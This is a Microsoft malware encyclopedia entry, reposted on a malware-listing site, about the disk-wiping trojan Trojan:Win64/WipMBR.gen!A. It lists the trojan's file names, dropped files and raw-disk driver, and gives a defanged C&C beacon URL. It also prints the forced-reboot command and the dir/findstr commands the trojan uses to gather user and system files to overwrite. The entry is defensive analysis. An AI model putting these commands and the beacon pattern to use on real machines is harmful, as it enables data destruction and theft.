Home / malwarePDF  

Trojan:Win64/WipMBR.gen!A


First posted on 22 August 2012.
Source: Microsoft

Aliases :

Trojan:Win64/WipMBR.gen!A is also known as Troj/MBRWipe-C (Sophos), KillFiles.RK (AVG), Trojan.EraseMBR.I (BitDefender), Trojan.KillMBR.165 (Dr.Web), Trojan.Win64.EraseMBR (Kaspersky), W64/DistTrack!comm (McAfee), Win-Trojan/Disttrack.155136 (AhnLab), WORM_WIPMBR.A (Trend Micro).

Explanation :



Trojan:Win64/WipMBR.gen!A is a trojan that overwrites your computer's MBR (master boot record) and other files, thus preventing you from accessing your operating system and using your computer. The trojan also connects to a remote host and may download arbitrary files.



Installation

Trojan:Win64/WipMBR.gen!A is dropped and run by Trojan:Win64/WipMBR.A on 64-bit operating systems, with one of the following file names:

  • caclsrv.exe
  • certutl.exe
  • clean.exe
  • ctrl.exe
  • dfrag.exe
  • dnslookup.exe
  • dvdquery.exe
  • event.exe
  • extract.exe
  • findfile.exe
  • fsutl.exe
  • gpget.exe
  • iissrv.exe
  • ipsecure.exe
  • msinit.exe
  • netx.exe
  • ntdsutl.exe
  • ntfrsutil.exe
  • ntnw.exe
  • power.exe
  • rdsadmin.exe
  • regsys.exe
  • routeman.exe
  • rrasrv.exe
  • sacses.exe
  • sfmsc.exe
  • sigver.exe
  • smbinit.exe
  • wcscript.exe


Trojan:Win64/WipMBR.gen!A drops the following files:

%SystemRoot%\system32\netinit.exe
%SystemRoot%\system32\drivers\drdisk.sys

Note: %SystemRoot% refers to a variable location that is determined by the malware by querying the operating system. The default location for the SystemRoot folder for Windows 2000, XP, 2003, Vista and 7 is "C:\Windows".

Once dropped, the "netinit.exe" file's creation time, last access time and last write time are set to be the same as that of the system file "kernel32.dll". Trojan:Win64/WipMBR.gen!A schedules a job to run the file immediately.

The trojan installs the "drdisk.sys" file as a system device driver with the name "drdisk". This file is a clean driver from EldoS that provides "raw disk access".
Raw disk access refers to the underlying data on a disk - the actual ones and zeros that make up all of the data on that disk.



Payload

Contacts remote host

Trojan:Win64/WipMBR.gen!A contacts a private C&C (command and control) server with the following URL:

hxxp://10.1.252.19/ajax_modal/modal/data.asp?mydata=<content/line count of "%SystemRoot%\inf\netft429.pnf">&uid=<local IP>&state=<system tick count>

This URL refers to a local IP address, which could indicate that a second machine is infected on the network and is acting as the C&C server.

Note: <system tick count> is a precise measurement of the number of milliseconds which have elapsed since your computer was last started.

Trojan:Win64/WipMBR.gen!A may download an additional file from the C&C server to the following location:

%SystemRoot%\Temp\filer<random number>.exe

Note: At the time of analysis, the C&C server was inaccessible.

Overwrites the MBR

Trojan:Win64/WipMBR.gen!A overwrites the MBR (master boot record). It also tries to overwrite data on non-system hard disk partitions and the files listed in f1.inf and f2.inf (see the Additional information section in this description) with part of a JPEG file.

Note: No image will be shown as the file is only part of a JPEG and not an actual image.

A non-system hard disk partition is a partition, or area, of a hard disk that does not contain system files or information related to the operation of your computer's operating system.

After overwriting the MBR and other files, it opens a command prompt and runs the command "shutdown -r -f -t 2" to shut down your computer.

Additional information

Trojan:Win64/WipMBR.gen!A opens a command prompt and runs the following commands to get the list of files that it overwrites:

  • "dir \"C:\\Documents and Settings\\\" /s /b /a:-D 2>nul | findstr -i download 2>nul >f1.inf"
  • "dir \"C:\\Documents and Settings\\\" /s /b /a:-D 2>nul | findstr -i document 2>nul >>f1.inf"
  • "dir C:\\Users\\ /s /b /a:-D 2>nul | findstr -i download 2>nul >>f1.inf"
  • "dir C:\\Users\\ /s /b /a:-D 2>nul | findstr -i document 2>nul >>f1.inf"
  • "dir C:\\Users\\ /s /b /a:-D 2>nul | findstr -i picture 2>nul >>f1.inf"
  • "dir C:\\Users\\ /s /b /a:-D 2>nul | findstr -i video 2>nul >>f1.inf"
  • "dir C:\\Users\\ /s /b /a:-D 2>nul | findstr -i music 2>nul >>f1.inf"
  • "dir \"C:\\Documents and Settings\\\" /s /b /a:-D 2>nul | findstr -i desktop 2>nul >f2.inf"
  • "dir C:\\Users\\ /s /b /a:-D 2>nul | findstr -i desktop 2>nul >>f2.inf"
  • "dir C:\\Windows\\System32\\Drivers /s /b /a:-D 2>nul >>f2.inf"
  • "dir C:\\Windows\\System32\\Config /s /b /a:-D 2>nul | findstr -v -i systemprofile 2>nul >>f2.inf"
  • "dir f1.inf /s /b 2>nul >>f1.inf"
  • "dir f2.inf /s /b 2>nul >>f1.inf"


It stores this list in the following files, in the same location as Trojan:Win64/WipMBR.gen!A:

  • f1.inf
  • f2.inf
Related encyclopedia entries

Trojan:Win64/WipMBR.A



Analysis by Shawn Wang

Last update 22 August 2012

 

TOP

Malware :

Family: